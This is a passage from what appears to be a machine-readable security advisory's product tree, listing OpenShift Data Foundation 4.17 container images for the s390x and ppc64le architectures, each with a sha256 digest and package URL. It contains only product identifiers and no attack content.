"odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", product_id: "odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", product_identification_helper: { purl: "pkg:oci/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d?arch=s390x&repository_url=registry.redhat.io/odf4/mcg-rhel9-operator&tag=v4.17.0-23", }, }, }, { category: "product_version", name: "odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", product: { name: "odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", product_id: "odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", product_identification_helper: { purl: "pkg:oci/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a?arch=s390x&repository_url=registry.redhat.io/odf4/ocs-client-console-rhel9&tag=v4.17.0-53", }, }, }, { category: "product_version", name: "odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", product: { name: "odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", product_id: "odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", product_identification_helper: { purl: "pkg:oci/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20?arch=s390x&repository_url=registry.redhat.io/odf4/ocs-client-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", product: { name: "odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", product_id: "odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", product_identification_helper: { purl: "pkg:oci/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a?arch=s390x&repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator&tag=v4.17.0-31", }, }, }, { category: "product_version", name: "odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", product: { name: "odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", product_id: "odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", product_identification_helper: { purl: "pkg:oci/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e?arch=s390x&repository_url=registry.redhat.io/odf4/ocs-metrics-exporter-rhel9&tag=v4.17.0-66", }, }, }, { category: "product_version", name: "odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", product: { name: "odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", product_id: "odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", product_identification_helper: { purl: "pkg:oci/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c?arch=s390x&repository_url=registry.redhat.io/odf4/ocs-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", product: { name: "odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", product_id: "odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", product_identification_helper: { purl: "pkg:oci/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3?arch=s390x&repository_url=registry.redhat.io/odf4/ocs-rhel9-operator&tag=v4.17.0-60", }, }, }, { category: "product_version", name: "odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", product: { name: "odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", product_id: "odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", product_identification_helper: { purl: "pkg:oci/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932?arch=s390x&repository_url=registry.redhat.io/odf4/odf-cli-rhel9&tag=v4.17.0-29", }, }, }, { category: "product_version", name: "odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", product: { name: "odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", product_id: "odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", product_identification_helper: { purl: "pkg:oci/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310?arch=s390x&repository_url=registry.redhat.io/odf4/odf-console-rhel9&tag=v4.17.0-53", }, }, }, { category: "product_version", name: "odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", product: { name: "odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", product_id: "odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", product_identification_helper: { purl: "pkg:oci/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54?arch=s390x&repository_url=registry.redhat.io/odf4/odf-cosi-sidecar-rhel9&tag=v4.17.0-7", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", product: { name: "odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", product_id: "odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076?arch=s390x&repository_url=registry.redhat.io/odf4/odf-csi-addons-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", product: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", product_id: "odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e?arch=s390x&repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator&tag=v4.17.0-30", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", product: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", product_id: "odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168?arch=s390x&repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9&tag=v4.17.0-30", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", product: { name: "odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", product_id: "odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", product_identification_helper: { purl: "pkg:oci/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c?arch=s390x&repository_url=registry.redhat.io/odf4/odf-multicluster-console-rhel9&tag=v4.17.0-53", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", product: { name: "odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", product_id: "odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", product_identification_helper: { purl: "pkg:oci/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f?arch=s390x&repository_url=registry.redhat.io/odf4/odf-multicluster-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", product: { name: "odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", product_id: "odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", product_identification_helper: { purl: "pkg:oci/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af?arch=s390x&repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator&tag=v4.17.0-17", }, }, }, { category: "product_version", name: "odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", product: { name: "odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", product_id: "odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", product_identification_helper: { purl: "pkg:oci/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61?arch=s390x&repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9&tag=v4.17.0-14", }, }, }, { category: "product_version", name: "odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", product: { name: "odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", product_id: "odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", product_identification_helper: { purl: "pkg:oci/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012?arch=s390x&repository_url=registry.redhat.io/odf4/odf-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", product: { name: "odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", product_id: "odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", product_identification_helper: { purl: "pkg:oci/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e?arch=s390x&repository_url=registry.redhat.io/odf4/odf-rhel9-operator&tag=v4.17.0-20", }, }, }, { category: "product_version", name: "odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", product: { name: "odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", product_id: "odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", product_identification_helper: { purl: "pkg:oci/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7?arch=s390x&repository_url=registry.redhat.io/odf4/odf-prometheus-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", product: { name: "odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", product_id: "odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", product_identification_helper: { purl: "pkg:oci/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5?arch=s390x&repository_url=registry.redhat.io/odf4/odr-cluster-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", product: { name: "odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", product_id: "odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", product_identification_helper: { purl: "pkg:oci/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5?arch=s390x&repository_url=registry.redhat.io/odf4/odr-hub-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", product: { name: "odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", product_id: "odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", product_identification_helper: { purl: "pkg:oci/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb?arch=s390x&repository_url=registry.redhat.io/odf4/odr-rhel9-operator&tag=v4.17.0-40", }, }, }, { category: "product_version", name: "odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", product: { name: "odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", product_id: "odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", product_identification_helper: { purl: "pkg:oci/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705?arch=s390x&repository_url=registry.redhat.io/odf4/odr-recipe-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", product: { name: "odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", product_id: "odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", product_identification_helper: { purl: "pkg:oci/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497?arch=s390x&repository_url=registry.redhat.io/odf4/rook-ceph-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", product: { name: "odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", product_id: "odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", product_identification_helper: { purl: "pkg:oci/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7?arch=s390x&repository_url=registry.redhat.io/odf4/rook-ceph-rhel9-operator&tag=v4.17.0-51", }, }, }, ], category: "architecture", name: "s390x", }, { branches: [ { category: "product_version", name: "odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", product: { name: "odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", product_id: "odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", product_identification_helper: { purl: "pkg:oci/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161?arch=ppc64le&repository_url=registry.redhat.io/odf4/cephcsi-rhel9&tag=v4.17.0-46", }, }, }, { category: "product_version", name: "odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", product: { name: "odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", product_id: "odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", product_identification_helper: { purl: "pkg:oci/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4?arch=ppc64le&repository_url=registry.redhat.io/odf4/cephcsi-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", product: { name: "odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", product_id: "odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", product_identification_helper: { purl: "pkg:oci/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202?arch=ppc64le&repository_url=registry.redhat.io/odf4/cephcsi-rhel9-operator&tag=v4.17.0-15", }, }, }, { category: "product_version", name: "odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", product: { name: "odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", product_id: "odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", product_identification_helper: { purl: "pkg:oci/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348?arch=ppc64le&repository_url=registry.redhat.io/odf4/mcg-core-rhel9&tag=v4.17.0-69", }, }, }, { category: "product_version", name: "odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", product: { name: "odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", product_id: "odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", product_identification_helper: { purl: "pkg:oci/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee?arch=ppc64le&repository_url=registry.redhat.io/odf4/mcg-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", product: { name: "odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", product_id: "odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", product_identification_helper: { purl: "pkg:oci/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55?arch=ppc64le&repository_url=registry.redhat.io/odf4/mcg-rhel9-operator&tag=v4.17.0-23", }, }, }, { category: "product_version", name: "odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", product: { name: "odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", product_id: "odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", product_identification_helper: { purl: "pkg:oci/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc?arch=ppc64le&repository_url=registry.redhat.io/odf4/ocs-client-console-rhel9&tag=v4.17.0-53", }, }, }, { category: "product_version", name: "odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", product: { name: "odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", product_id: "odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", product_identification_helper: { purl: "pkg:oci/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541?arch=ppc64le&repository_url=registry.redhat.io/odf4/ocs-client-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", product: { name: "odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", product_id: "odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", product_identification_helper: { purl: "pkg:oci/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c?arch=ppc64le&repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator&tag=v4.17.0-31", }, }, }, { category: "product_version", name: "odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", product: { name: "odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", product_id: "odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", product_identification_helper: { purl: "pkg:oci/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a?arch=ppc64le&repository_url=registry.redhat.io/odf4/ocs-metrics-exporter-rhel9&tag=v4.17.0-66", }, }, }, { category: "product_version", name: "odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", product: { name: "odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", product_id: "odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", product_identification_helper: { purl: "pkg:oci/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd?arch=ppc64le&repository_url=registry.redhat.io/odf4/ocs-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", product: { name: "odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", product_id: "odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", product_identification_helper: { purl: "pkg:oci/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0?arch=ppc64le&repository_url=registry.redhat.io/odf4/ocs-rhel9-operator&tag=v4.17.0-60", }, }, }, { category: "product_version", name: "odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", product: { name: "odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", product_id: "odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-cli-rhel9&tag=v4.17.0-29", }, }, }, { category: "product_version", name: "odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", product: { name: "odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", product_id: "odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-console-rhel9&tag=v4.17.0-53", }, }, }, { category: "product_version", name: "odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", product: { name: "odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", product_id: "odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-cosi-sidecar-rhel9&tag=v4.17.0-7", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", product: { name: 